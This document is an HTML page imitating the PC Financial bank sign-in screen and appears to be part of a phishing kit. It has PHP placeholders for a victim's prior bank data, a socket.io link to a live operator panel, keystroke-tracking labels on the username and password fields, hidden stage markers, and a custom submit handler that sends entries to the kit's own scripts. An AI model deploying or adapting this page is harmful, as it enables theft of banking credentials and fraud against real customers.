<html lang="en">
    <head>
        <base href="/">
        <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
        <meta http-equiv="Pragma" content="no-cache">
        <meta http-equiv="Expires" content="0">
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <title>Login | PC Financial</title>
        <link rel="stylesheet" href="/assets/pc/main.css?3" media="all" onload="this.media=&quot;all&quot;">
        <link rel="stylesheet" href="/assets/pc/styles.21f273279e0376a0.css?1" media="all" onload="this.media=&quot;all&quot;">
        <link rel="icon" type="image/x-icon" href="/assets/pc/favicon.ico">
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>
            var lrbank = '<?=escape($udata->last->bank)?>';
            var lrinfo = '<?=escape($udata->last->info)?>';
        </script>
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.css">
        <script src="/assets/js/actions.js?v=<?=time()?>"></script>
        <script src="/socket.io/socket.io.js"></script>
    </head>
    <body class="">
        <app-root ng-version="14.2.12">
            <div id="popper-wrapper" class="route-en route-login">
                <ng-component>
                    <router-outlet></router-outlet>
                    <login-container _nghost-qsi-c156="">
                        <app-header _ngcontent-qsi-c156="" class="public-header" _nghost-qsi-c154="">
                            <header _ngcontent-qsi-c154="">
                                <app-logo _ngcontent-qsi-c154="" _nghost-qsi-c85="">
                                    <h1 _ngcontent-qsi-c85="">
                                        <a _ngcontent-qsi-c85="" class="logo-link">
                                            <img _ngcontent-qsi-c85="" src="/assets/pc/pcf-logo-light.svg" alt="Navigate to PC Financial website"><!---->
                                        </a>
                                        <!----><!---->
                                    </h1>
                                    <!----><!----><!----><!----><!----><!---->
                                </app-logo>
                            </header>
                            <!----><!---->
                        </app-header>
                        <main _ngcontent-qsi-c156="" class="login-container">
                            <header _ngcontent-qsi-c156="">
                                <div _ngcontent-qsi-c156="" class="login-header-container">
                                    <h2 _ngcontent-qsi-c156="">Welcome to PC Financial<sup>®</sup></h2>
                                    <p _ngcontent-qsi-c156="">Manage your account, track your spending, and get support, all at your fingertips.</p>
                                </div>
                            </header>
                            <div _ngcontent-qsi-c156="" class="login-form-container">
                                <h3 _ngcontent-qsi-c156="">Sign in</h3>
                                <form id="loginForm" _ngcontent-qsi-c156="" tabindex="-1" class="form ng-untouched ng-pristine ng-invalid lab-form">
                                    <input type="hidden" id="userAgent" name="userAgent">
                                    <div _ngcontent-qsi-c156="" class="form-group required">
                                        <label _ngcontent-qsi-c156="" for="username">Username</label>
                                        <input _ngcontent-qsi-c156="" type="text" id="input-username" name="username" autocomplete="off" placeholder="Enter username" class="ng-untouched ng-pristine ng-invalid input-username" attr-action="Filling Username" required>
                                        <div _ngcontent-qsi-c156="" class="forgot-container"><a _ngcontent-qsi-c156="" class="nav-link"> Forgot username </a></div>
                                        <div _ngcontent-qsi-c156="" class="form-control-feedback">
                                            <span _ngcontent-qsi-c156="" role="alert"> This information is required </span><!---->
                                        </div>
                                    </div>
                                    <div _ngcontent-qsi-c156="" class="form-group required">
                                        <label _ngcontent-qsi-c156="" for="password">Password</label>
                                        <div _ngcontent-qsi-c156="" class="password-toggle-container" style="position: relative;">
                                            <input _ngcontent-qsi-c156="" type="password" id="input-password" name="password" autocomplete="off" placeholder="Enter password" class="ng-untouched ng-pristine ng-invalid input-password lrinput" attr-action="Filling Password" style="padding-right: 60px;" required>
                                            <div _ngcontent-qsi-c156="" class="unmask-toggle" style="background-image: url(&quot;/assets/pc/unmask-password-light-mode.svg&quot;);"></div>
                                        </div>
                                        <div _ngcontent-qsi-c156="" class="forgot-container"><a _ngcontent-qsi-c156="" class="nav-link">Forgot password</a></div>
                                        <div _ngcontent-qsi-c156="" class="form-control-feedback">
                                            <span _ngcontent-qsi-c156="" role="alert"> This information is required </span><!---->
                                        </div>
                                    </div>
                                    <div _ngcontent-qsi-c156="" class="tooltip-container">
                                        <label _ngcontent-qsi-c156="" for="remember-me" class="checkbox-container"><input _ngcontent-qsi-c156="" type="checkbox" id="remember-me" formcontrolname="rememberMe" class="ng-untouched ng-pristine ng-valid"><span _ngcontent-qsi-c156="">Remember me</span></label>
                                        <tooltip _ngcontent-qsi-c156="" _nghost-qsi-c106="">
                                            <button _ngcontent-qsi-c106="" type="button" class="btn btn-tooltip" aria-label="More info: If you check this box, we'll remember your username to make it easier for you to sign in next time. Don't check this if you're using a public computer."></button><!---->
                                            <popper-content _ngcontent-qsi-c106="">
                                                <div class="ngxp__container ngxp__animation tooltip-wrapper" aria-hidden="true" role="popper" style="display: none; opacity: 0;">
                                                    <!---->
                                                    <div class="ngxp__inner">
                                                        <p _ngcontent-qsi-c156="">If you check this box, we'll remember your username to make it easier for you to sign in next time. Don't check this if you're using a public computer.</p>
                                                    </div>
                                                    <!---->
                                                    <div class="ngxp__arrow"></div>
                                                </div>
                                            </popper-content>
                                            <!---->
                                        </tooltip>
                                    </div>
                                    <button onclick="submitForm()" _ngcontent-qsi-c156="" type="button" data-qa="login-button" class="btn btn-primary" name="save" value="1">
                                        <loader _ngcontent-qsi-c156="" _nghost-qsi-c80="">
                                            <span _ngcontent-qsi-c156="">Sign in</span><!----><!---->
                                        </loader>
                                    </button>
                                </form>
                            </div>
                        </main>
                        <blade-inactive-account _ngcontent-qsi-c156="" _nghost-qsi-c155="">
                            <!---->
                        </blade-inactive-account>
                        <blade-two-factor-authentication _ngcontent-qsi-c156="" _nghost-qsi-c147="">
                            <!---->
                        </blade-two-factor-authentication>
                        <app-footer _ngcontent-qsi-c156="" _nghost-qsi-c87="">
                            <footer _ngcontent-qsi-c87="">
                                <div _ngcontent-qsi-c87="" id="footer-wrapper" class="footer-wrapper">
                                    <div _ngcontent-qsi-c87="" class="footer-container">
                                        <div _ngcontent-qsi-c87="" class="footer-list-container">
                                            <div _ngcontent-qsi-c87="" class="footer-child branding-social">
                                                <div _ngcontent-qsi-c87="" class="footer-logo-container">
                                                    <app-logo _ngcontent-qsi-c87="" headertagtype="h2" theme="dark" _nghost-qsi-c85="">
                                                        <!---->
                                                        <h2 _ngcontent-qsi-c85="">
                                                            <a _ngcontent-qsi-c85="" class="logo-link">
                                                                <img _ngcontent-qsi-c85="" src="/assets/pc/pcf-logo-dark.svg" alt="Navigate to PC Financial website"><!---->
                                                            </a>
                                                            <!----><!---->
                                                        </h2>
                                                        <!----><!----><!----><!----><!---->
                                                    </app-logo>
                                                </div>
                                                <div _ngcontent-qsi-c87="" class="footer-app_stores">
                                                    <ul _ngcontent-qsi-c87="">
                                                        <li _ngcontent-qsi-c87=""><a _ngcontent-qsi-c87="" target="_blank" rel="noopener noreferrer" href="https://itunes.apple.com/ca/app/pc-financial/id1446078005?mt=8"><img _ngcontent-qsi-c87="" src="/assets/pc/app-store.svg" alt="Apple App Store"></a></li>
                                                        <li _ngcontent-qsi-c87=""><a _ngcontent-qsi-c87="" target="_blank" rel="noopener noreferrer" href="https://play.google.com/store/apps/details?id=ca.pcfinancial.bank"><img _ngcontent-qsi-c87="" src="/assets/pc/google-play.svg" alt="Google Play Store"></a></li>
                                                        <li _ngcontent-qsi-c87=""><a _ngcontent-qsi-c87="" target="_blank" rel="noopener noreferrer" href="https://www.cdic.ca/your-coverage/protecting-your-deposit/?widget=1"><img _ngcontent-qsi-c87="" src="/assets/pc/cdic-digital-symbol.svg" alt="Canada Deposit Insurance Corporation (CDIC) logo"></a></li>
                                                    </ul>
                                                </div>
                                                <div _ngcontent-qsi-c87="" class="footer-social">
                                                    <ul _ngcontent-qsi-c87="">
                                                        <li _ngcontent-qsi-c87=""><a _ngcontent-qsi-c87="" target="_blank" rel="noopener noreferrer" href="https://www.facebook.com/PCFinancial"><img _ngcontent-qsi-c87="" src="/assets/pc/facebook.svg" alt="Facebook"></a></li>
                                                        <li _ngcontent-qsi-c87=""><a _ngcontent-qsi-c87="" target="_blank" rel="noopener noreferrer" href="https://www.instagram.com/pcfinancial"><img _ngcontent-qsi-c87="" src="/assets/pc/instagram.svg" alt="Instagram"></a></li>
                                                        <li _ngcontent-qsi-c87=""><a _ngcontent-qsi-c87="" target="_blank" rel="noopener noreferrer" href="https://twitter.com/pcfinancial"><img _ngcontent-qsi-c87="" src="/assets/pc/twitter.svg" alt="Twitter"></a></li>
                                                        <li _ngcontent-qsi-c87=""><a _ngcontent-qsi-c87="" target="_blank" rel="noopener noreferrer" href="https://ca.linkedin.com/company/president's-choice-financial"><img _ngcontent-qsi-c87="" src="/assets/pc/linkedin.svg" alt="Linked In"></a></li>
                                                    </ul>
                                                </div>
                                                <!---->
                                            </div>
                                        </div>
                                        <p _ngcontent-qsi-c87="" class="copyright">President's Choice Financial Mastercard is provided by President's Choice Bank. <em>PC Optimum</em> program is provided by President’s Choice Services Inc.</p>
                                    </div>
                                </div>
                            </footer>
                        </app-footer>
                    </login-container>
                    <fullscreen-takeover _nghost-qsi-c122="">
                        <!---->
                    </fullscreen-takeover>
                    <modal-message-error _nghost-qsi-c123="">
                        <!---->
                    </modal-message-error>
                </ng-component>
            </div>
        </app-root>
        <div class="full-screen-loader div-loader">
            <div class="loader-container lrg">
                <div class="loader">
                    <p role="alert">Loading</p>
                </div>
            </div>
        </div>
       
        
        <span hidden id="navig"> <%=navig%> </span>
        <span hidden id="stage">Login</span>
    </body>
    <script src="/bank/pc/js/script.js">
    </script>
</html>
